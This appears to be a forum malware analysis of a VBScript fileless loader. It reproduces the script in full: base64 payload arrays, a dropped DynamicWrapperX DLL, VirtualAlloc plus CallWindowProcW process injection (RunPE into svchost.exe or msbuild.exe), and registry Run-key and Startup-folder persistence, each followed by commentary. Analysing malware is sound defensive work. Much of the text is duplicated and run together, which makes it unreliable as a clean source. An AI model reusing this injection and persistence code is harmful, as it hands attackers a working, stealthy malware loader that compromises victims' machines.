99OTNPfnpwYrfjefeHNyfYSXUS6Vd2DpB3GewfOCx5jvyTCMXqW/OaU4vYK3sH9MvZOuAt0gimvyL/7HNU4Ocia0eHbe2aKPpkKzVBDzWVwFtFzPEFnBZSrHN0hvw=="
FILE_DATA (5) = "MJNqIdZ1uXStpejnW5CpqDgtnby/vIUOEyh95BhKhc+By5XMH43OhaoQ8DaS/jo1tCyPl2EiMN2HRaLZg7lbjd6b6ic6o.sqhIAmubRGtJ5emVmLxH3avnaiiepZbz+39urg//3TBLlUOGe2j7E03Zubs9e8PywkfpASWjqknNnP1G9KEHg...
...
McJoX08PLHa+QHqh5hSUr54hVadQftCdbcCmTF9vBsdUm6R9IqGYa3AolZ4mFYOnveLcxfDOVOOyWY5xsLlOOGud1y8RJG2aXoQ7MRm1eo5kIHUsDCR9dVem+ArOow=="
FILE_DATA (6) = "x4fzHD8BvenVSFZuBvNL9YJmBjYdSkKDtbtzCek9LJEBw8tVwHEQnSi95n91HnK6AohNfNlPef7njeIpUZQbshBtVipYuo2h5Z+DY7FhVHFjNoh/RSV8chen6q6mds6h0ZkatwnARYUOPMP34hSG44pxellgtramKOFOenOLivA3/bkIiz....
...
Dp58PTJtZOl5yzuTlGdA5F/u9hgZTszlo8/Bbut7NL01rOWFGbZOa1nITRJyy5L/7ruVEALeiymQOzy+LDzaU5ZTc7/Utgfm+VQ7HX54UKfdQjLmLD1DBZTiKEztNcJ5HIYNIW53yaXQ0KZNCA=="
FILE_DATA (7) = "V7YaHTaF8+ho4vZz9FpWiy2/uJV18nQ9hx1ERmGqgMn51Y3YavcBBADiIe33FOYxhGJxmu8zAlCVJizhpCepw4tmpikDkrJnVUhG60VwMrvY2rySeiFhGyOl75bjH+GXlo4Jx1GtEfz0jwAKoEGUgBnXU9i5veroF50DjmGk1oMyrHAF....
...
tCig4hbSu/ZBNpmwrMm14QycNecqJXb+KcyERChxqslnyQ9DeZGu4ODhYTeY+L1uVfQQCJ7yxFHeLA0h5eD4sLsPzQqosnj8ezF58VU/LHsZZNCtWgExr0X+MtdW/CMPVAb+pDynmi3tUpYZRyg=="
FILE_DATA (8) = "6DGvTSwA7nUrhI66OqmEElJTbMPU3DyR6FVnyTbh6gj56u954fvPcxLS197EJOr1BXYSebRNKSAj/TbdqizPsEqLd18m.tFORl5CCLvioHzPKgoAQbbRuPYhz3F+fIg7x4w4nIL2agbubZ/taz6EHRNTdpOOxukKzS7+PvP3IlnJRzyeEncZ...
...
7Rvus5Eq1NxZwGlJwkwPhu5PoSk5dnZ5rrPUdcP0KwFOAK5t+a3PHgLYuzGIQIUItrV2HOrM0fU2ZgPHkcjyQmELUrkpBz7sFHo/KrzI24jmnzhVpLV/TGIESZni7ViJHtw=="
FILE_DATA (9) = ""
FILE_SIZE = 35328
'=-=-=-=-= CONSTO =-=-=-=
'=-=-=-=-= MYCODE =-=-=-=
START
FIX_WOW64
DCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME & ".BIN"
IF NOT IS_DOTNET THEN
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%" & "\\" & HOST_FILE)
ELSE
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%")&"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE"
END IF
WRITE_FILE DCOM_NAME,TEXTTOBINARY(DCOM_DATA, "BIN.BASE64")
DO
SHELLOBJ.RUN "REGSVR32.EXE /I /S "& CHR(34)&DCOM_NAME& CHR(34),0,TRUE
SET DCOM = CREATEOBJECT("DYNAMICWRAPPERX")
WSCRIPT.SLEEP 1000
LOOP UNTIL ISOBJECT(DCOM)
DCOM.REGISTER "USER32.DLL", "CallWindowProcW",LCASE("I=PHULL"), LCASE("R=U")
DCOM.REGISTER "KERNEL32.DLL", "VirtualAlloc",LCASE("I=PUUU"), LCASE("R=P")
LOADER_DATA = BASE64TOHEX (LOADER_DATA)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FILE_DATA(I) = BASE64TOHEX (FILE_DATA(I))
NEXT
LOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(LOADER_DATA)/2,4096,64)
FOR I = 1 TO LEN (LOADER_DATA) STEP 2
CHAR = ASC(CHR("&H"&MID (LOADER_DATA,I,2)))
DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2
NEXT
COUNT = 0
PE_PTR = DCOM.VIRTUALALLOC (0,FILE_SIZE+1,4096,64)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FOR X = 1 TO LEN (FILE_DATA(I)) STEP 2
CHAR = ASC(CHR("&H"&MID (FILE_DATA(I),X,2)))
DCOM.NUMPUT EVAL(CHAR),PE_PTR,COUNT
COUNT = COUNT + 1
NEXT
NEXT
DCOM.CALLWINDOWPROCW LOADER_PTR,PE_PTR,DCOM.STRPTR (HOST_FILE),DCOM.STRPTR (COMMAND_LINE),0
SUB FIX_WOW64
SET OBJWMISERVICE = GETOBJECT ("WINMGMTS:\\\\.\\ROOT\\CIMV2")
SET COLITEMS = OBJWMISERVICE.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
FOR EACH OBJITEM IN COLITEMS
\tSYSTEMTYPE = OBJITEM.SYSTEMTYPE
NEXT
IF (UCASE(SYSTEMTYPE) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
SHELLOBJ.RUN SHELLOBJ.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\\SYSWOW64\\WSCRIPT.EXE //b //e:vbscript "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
WSCRIPT.QUIT
END IF
END SUB
SUB START ()
IF START_UP_REG = TRUE THEN
START_F = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,START_F ,TRUE
SHELLOBJ.REGWRITE "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\" & FILE_NAME,"WScript.exe //b //e:vbscript " & CHRW(34) & START_F & CHRW(34) ,"REG_SZ"
END IF
IF START_UP_FOLDER = TRUE THEN
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,SHELLOBJ.SPECIALFOLDERS ("STARTUP") & "\\" & FILE_NAME & ".vbs" ,TRUE
END IF
IF START_UP_TASK = TRUE THEN
END IF
END SUB
FUNCTION BINARYTOTEXT (BINARY, DATATYPE)
DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = BINARY
DOM.DOCUMENTELEMENT.REMOVEATTRIBUTE(LCASE("DTT"))
BINARYTOTEXT = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTIONSET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = BINARY
DOM.DOCUMENTELEMENT.REMOVEATTRIBUTE(LCASE("DT
T"))BINARYTOTEXT = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
FUNCTION TEXTTOBINARY (TEXT, DATATYPE)
DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = TEXT
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
TEXTTOBINARY = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTIONSET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = TEXT
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
TEXTTOBINARY = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
FUNCTION BASE64TOHEX(STRBASE64)
BASE64TOHEX = BINARYTOTEXT(TEXTTOBINARY(STRBASE64, "BIN.BASE64"), "BIN.HEX")
END FUNCTIONFUNCTION WRITE_FILE (FILE_NAME,FILE_DATA)
IF FILESYSTEMOBJ.FILEEXISTS (FILE_NAME) THEN EXIT FUNCTION
CONST ADTYPEBINARY = 1
SET BINARYSTREAM = CREATEOBJECT("ADODB.STREAM")
BINARYSTREAM.TYPE = ADTYPEBINARY
BINARYSTREAM.OPEN
BINARYSTREAM.WRITE FILE_DATA
BINARYSTREAM.SAVETOFILE FILE_NAME
SET BINARYSTREAM = NOTHING
END FUNCTIONCONST ADTYPEBINARY = 1
SET BINARYSTREAM = CREATEOBJECT("ADODB.STREAM")
BINARYSTREAM.TYPE = ADTYPEBINARY
BINARYSTREAM.OPEN
BINARYSTREAM.WRITE FILE_DATA
BINARYSTREAM.SAVETOFILE FILE_NAME
SET BINARYSTREAM = NOTHING
3) Explanation of the real content :
All parts are in UPPERCASE, and I really think it hurts the eyes
So, on below parts, I made all uppercase (to avoid become blind ...)
So, on below parts, I made all uppercase (to avoid become blind ...)
3-1) Config / global data :
Here are important data that will be used late, and help the script to make decision (some value tests ) :
'=-=-=-=-= CONFIG =-=-=-=
host_file = "system32\\svchost.exe"
file_name = "injector.vbs"
install_dir = "%temp%"
start_up_reg = false
start_up_task = false
start_up_folder = false
command_line = ""
'=-=-=-=-= config =-=-=-=
on error resume next
'=-=-=-=-= global =-=-=-=
set filesystemobj = createobject ("scripting.filesystemobject")
set shellobj = wscript.createobject ("wscript.shell")
dim i
host_file = "system32\\svchost.exe"
file_name = "injector.vbs"
install_dir = "%temp%"
start_up_reg = false
start_up_task = false
start_up_folder = false
command_line = ""
'=-=-=-=-= config =-=-=-=
on error resume next
'=-=-=-=-= global =-=-=-=
set filesystemobj = createobject ("scripting.filesystemobject")
set shellobj = wscript.createobject ("wscript.shell")
dim i
We can already see some well known part (if you have already followed some of my posts)
=> two objects are created, one for manipulation of files, the other for shell purpose
3-2) Constant objects :
'=-=-=-=-= CONSTO =-=-=-=
dcom_data = .....
loader_data = .....
dim file_data(10)
file_data (0) = ....
file_data (1) = ....
...
file_data (9) = ....
file_size = 35328
loader_data = .....
dim file_data(10)
file_data (0) = ....
file_data (1) = ....
...
file_data (9) = ....
file_size = 35328
Several Base64 encoded (very long) Strings are used.
We will see later that :
dcom_data => dll content (used to allows the api calls)
loader_data => encoded loader data used
file_data => array of encoded strings : malware parts
loader_data => encoded loader data used
file_data => array of encoded strings : malware parts
loader_data and file_data will be decoded and used for injection
3-3) Some functions :
binarytotext
texttobinary
base64tohex
3-4 ) How it works :texttobinary
base64tohex
For code manipulations the functions uses a MICROSOFT.XMLDOM object
Example :
write_fileExample :
function textToBinary (text, datatype)
Here, using a dom object, the conversion is very easydim dom
set dom = CreateObject("MICROSOFT.XMLDOM")
dom.loadXML("<HELLO/>")
dom.documentElement.nodeTypedValue = text
dom.documentElement.dataType = dataType
textToBinary= dom.documentElement.nodeTypedValue
end functionset dom = CreateObject("MICROSOFT.XMLDOM")
dom.loadXML("<HELLO/>")
dom.documentElement.nodeTypedValue = text
dom.documentElement.dataType = dataType
textToBinary= dom.documentElement.nodeTypedValue
function write_file (file_name,file_data)
it uses the fileSystemObject object created in the global data part (see 3-1) )
Uses an adodb.stream object to create a file on HD, with path and data as parameters
if fileSystemObj.fileExists (file_name) then exit function
const adTypeBinary = 1
set binarystream = createobject("adodb.stream")
binarystream.type = adtypebinary
binarystream.open
binarystream.write file_data
binarystream.saveToFile file_name
set binarystream= nothing
end functionconst adTypeBinary = 1
set binarystream = createobject("adodb.stream")
binarystream.type = adtypebinary
binarystream.open
binarystream.write file_data
binarystream.saveToFile file_name
set binarystream= nothing
it uses the fileSystemObject object created in the global data part (see 3-1) )
Uses an adodb.stream object to create a file on HD, with path and data as parameters
In VB, a function can return a value, Sub doesn't (other differences, but not important here).
'=-=-=-=-= MYCODE =-=-=-=
start
calls a sub that do its job or not according to the below Boolean / values :
start_up_reg
start_up_task
start_up_folder
fix_wow64start_up_reg
start_up_task
start_up_folder
sub start ()
if start_up_reg = true then
if start_up_folder = true then
if start_up_task = true then
end sub
In the current script :if start_up_reg = true then
=> it modifies the registry to make the actual script run when pc run
start_f = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name
filesystemobj.copyfile wscript.scriptfullname,start_f ,true
shellobj.regwrite "hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\\" & file_name,"wscript.exe //b //e:vbscript " & chrw(34) & start_f & chrw(34) ,"reg_sz"
end ifstart_f = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name
filesystemobj.copyfile wscript.scriptfullname,start_f ,true
shellobj.regwrite "hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\\" & file_name,"wscript.exe //b //e:vbscript " & chrw(34) & start_f & chrw(34) ,"reg_sz"
if start_up_folder = true then
=> it puts the script on startup folder
filesystemobj.copyfile wscript.scriptfullname,shellobj.specialfolders ("startup") & "\\" & file_name & ".vbs" ,true
end iffilesystemobj.copyfile wscript.scriptfullname,shellobj.specialfolders ("startup") & "\\" & file_name & ".vbs" ,true
if start_up_task = true then
=> empty part
end if
end sub
start_up_reg = false
start_up_task = false
start_up_folder = false
start_up_task = false
start_up_folder = false
=> the start sub makes nothing
sub fix_wow64
it forces to use the syswow64\wscript.exe if the initial script was run on a 64 bit OS (if needed, runs another instance of the current script with the targeted wscript.exe before wscript.quit )
=> syswow64 :
set objwmiservice = getobject ("winmgmts:\\\\.\\root\\cimv2")
set colitems = objwmiservice.execquery ("select * from win32_computersystem")
for each objitem in colitems
\tsystemtype = objitem.systemtype
next
if (ucase(systemtype) = "x64-based pc") and (instr (ucase(wscript.path),"syswow64") = 0) then
shellobj.run shellobj.expandenvironmentstrings("%windir%")&"\\syswow64\\wscript.exe //b //e:vbscript "&chr(34)&wscript.scriptfullname&chr(34)
wscript.quit
end if
end subset colitems = objwmiservice.execquery ("select * from win32_computersystem")
for each objitem in colitems
\tsystemtype = objitem.systemtype
next
if (ucase(systemtype) = "x64-based pc") and (instr (ucase(wscript.path),"syswow64") = 0) then
shellobj.run shellobj.expandenvironmentstrings("%windir%")&"\\syswow64\\wscript.exe //b //e:vbscript "&chr(34)&wscript.scriptfullname&chr(34)
wscript.quit
end if
it forces to use the syswow64\wscript.exe if the initial script was run on a 64 bit OS (if needed, runs another instance of the current script with the targeted wscript.exe before wscript.quit )
=> syswow64 :
"32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. 32-bit service applications are supported. The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications"
=> file_name = "injector.vbs"
=> install_dir = "%temp%"
=> dcom_name : %temp%\injector.vbs.bin
=> install_dir = "%temp%"
=> dcom_name : %temp%\injector.vbs.bin
if not is_dotnet thenhost_file = shellobj.expandenvironmentstrings ("%windir%" & "\\" & host_file)
else
host_file = shellobj.expandenvironmentstrings ("%windir%")&"\\microsoft.net\\framework\\v2.0.50727\\msbuild.exe"
end if
Here, the host_file :
"%windir%\system32\svchost.exe" if the Framewort .NET is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
write_file dcom_name,texttobinary(dcom_data, "bin.base64")
it creates the injector.vbs.bin (after base64code decoding) from functions we have seen in part 3-3)
and from hard coded data on dcom_data obfuscated string
and from hard coded data on dcom_data obfuscated string
What is this file ? A dll file, in reality
What is this dll s for ?
Hahaha, see below
What is this dll s for ?
Hahaha, see below
do
shellobj.run "regsvr32.exe /i /s "& chr(34)&dcom_name& chr(34),0,true
set dcom = createobject("dynamicwrapperx")
wscript.sleep 1000
loop until isobject(dcom)set dcom = createobject("dynamicwrapperx")
wscript.sleep 1000
=> a Loop to register the file injector.vbs.bin and create an object dynamicwrapperx
dcom.register "user32.dll", "callwindowprocw",lcase("i=phull"), lcase("r=u")
dcom.register "kernel32.dll", "virtualalloc",lcase("i=puuu"), lcase("r=p")
=> Now I can explain you :
- a dll (injector.vbs.bin) is registered,
- an object "dynamicwrapperx" is created => dcom
- this object is used to register two functions from API :
loader_data = base64tohex (loader_data)- a dll (injector.vbs.bin) is registered,
- an object "dynamicwrapperx" is created => dcom
- this object is used to register two functions from API :
injector.vbs.bin is in fact dynamicwrapperx.dll
An ActiveX component (COM server) that allows to call functions exported by DLL libraries, in particular Windows API functions, from scripts in JScript and VBScript.
=> callwindowprocw and virtualalloc can now be called from the script.An ActiveX component (COM server) that allows to call functions exported by DLL libraries, in particular Windows API functions, from scripts in JScript and VBScript.
for i = 0 to ubound (file_data) -1 step 1
file_data(i) = base64tohex (file_data(i))
next=> The loader_data and and file_data Strings are now deobfuscated
loader_ptr = dcom.virtualalloc (0,len(loader_data)/2,4096,64)
for i = 1 to len (loader_data) step 2
char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
nextdcom.numput eval(char),loader_ptr,(i-1)/2
count = 0
=> uses virtualalloc to reserve memory in the virtual address space of the calling process
=> loader_ptr is a pointer to this part on allocated memory
=> loader_data is put on allocated memory after some modifications :
=> loader_ptr is a pointer to this part on allocated memory
=> loader_data is put on allocated memory after some modifications :
- single loop For because loader_ptr is a string
char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
dcom.numput eval(char),loader_ptr,(i-1)/2
=> mid (loader_data,i,2) takes two chars from current index i
=> "&h" is added at the beginning to tell to the char function that the string has to be considered as a HEX representation :
=> "&h" is added at the beginning to tell to the char function that the string has to be considered as a HEX representation :
- example : "&h41" (HEX) will not give the same result as "41" (decimal)
=> dcom.numput eval(char),loader_ptr,(i-1)/2=> chr("&h41") => 'A'
=> chr("41") => ')'
=> chr("41") => ')'
=> char = asc(chr(...) ) :
gives the ASCII code (decimal)
writes the number at the loader_ptr address with (i-1)/2 offset
pe_ptr = dcom.virtualalloc (0,file_size+1,4096,64)for i = 0 to ubound (file_data) -1 step 1
for x = 1 to len (file_data(i)) step 2
nextchar = asc(chr("&h"&mid (file_data(i),x,2)))
dcom.numput eval(char),pe_ptr,count
count = count + 1
nextdcom.numput eval(char),pe_ptr,count
count = count + 1
=> uses virtualalloc to reserve memory in the virtual address space of the calling process
=> pe_ptr is a pointer to this part
=> file_data is put on allocated memory after some modifications :
=> pe_ptr is a pointer to this part
=> file_data is put on allocated memory after some modifications :
- multiple loops For because file_data is a tab of strings :
=> each string are handled by index i and for each, index x is used to make the job :
=> each string are handled by index i and for each, index x is used to make the job :
=> HEX representation of strings (two chars) to ASCII code
=> writes the number at the pe_ptr address with count offset
=> writes the number at the pe_ptr address with count offset
=> THE FILE-LESS MALWARE
C++ :
C++ :
LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
Here, for both memory allocations, only two parameters are used : lpAddress = 0, and the second parameter is the size to be allocated=> the return value is the pointer to the beginning of the allocated data
dcom.callwindowprocw loader_ptr, => the RunPE shellcode
pe_ptr, => A pointer the malware
dcom.strptr (host_file), => pointer to the host_file string
dcom.strptr (command_line), => pointer to the command_line (here : "")
0
dcom.strptr (host_file), => pointer to the host_file string
dcom.strptr (command_line), => pointer to the command_line (here : "")
0
=> the loader is called, and this one injects the malware part on the targeted host_file
=> run the malware part
Remember, in this script the host_file is :
C++ :Remember, in this script the host_file is :
"%windir%\system32\svchost.exe" if the Framewort .NET is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
LRESULT WINAPI CallWindowProc(
_In_ WNDPROC lpPrevWndFunc,
_In_ HWND hWnd,
_In_ UINT Msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);_In_ HWND hWnd,
_In_ UINT Msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
Last edited:
